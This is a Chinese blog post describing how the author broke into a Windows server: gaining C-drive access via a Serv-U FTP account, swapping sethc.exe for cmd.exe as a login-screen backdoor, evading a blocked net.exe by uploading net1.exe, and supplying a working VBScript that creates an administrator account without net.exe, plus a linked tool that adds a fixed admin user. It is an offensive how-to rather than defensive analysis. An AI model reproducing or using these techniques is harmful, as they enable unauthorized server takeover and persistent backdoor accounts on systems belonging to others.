昨天遇到一服务器Serv-U添加管理员失败（后来才发现原来是net.exe没权限），但可以成功添加ftp账户。于是添加了一个指向C盘的ftp账户，并成功连接。

接下来的思路就是通过替换sethc.exe为cmd.exe（改名覆盖），然后远程登录按5下shift激活运行sethc.exe，添加管理员。

但是当cmd运行起来后，执行net user命令的时候提示没有权限（如下图所示），上传了一个net.exe到C根目录下，执行仍然提示没有权限：





尝试上传net1.exe （和net.exe一样，都在system32下）到C根目录，这样执行竟然成功了，如下图所示。




后来网上查了一下，net.exe 在执行某些命令的时候是通过调用net1.exe来实现的，看来管理员只是禁用了net.exe的执行，而没有禁用net1.exe的执行。但是问题又来了，那为什么我上传的那个net.exe也不能执行呢？



附：下面的vbs可以不使用net和net1进行管理员的添加

'注意用户名不要和计算机名相同，否则添加到用户组时会失败
'添加用户



'注意用户名不要和计算机名相同，否则添加到用户组时会失败
on error resume next

Set AccountObj = GetObject("WinNT://127.0.0.1")
Set NewUser = AccountObj.Create("User", "redicecn") '用户名是redicecn
NewUser.SetPassword "redicecn" '密码是redicecn
NewUser.UserFlags = &H10000
NewUser.SetInfo


'将用户添加到管理员组
Set GroupObj = AccountObj.GetObject("Group","Administrators")
GroupObj.Add "winnt://redicecn"  '添加redicecn进入管理员组


File: Click to Download


另外找到一个命令程序，执行后即可添加管理员，用户名及密码均是：wlozz

File: Click to Download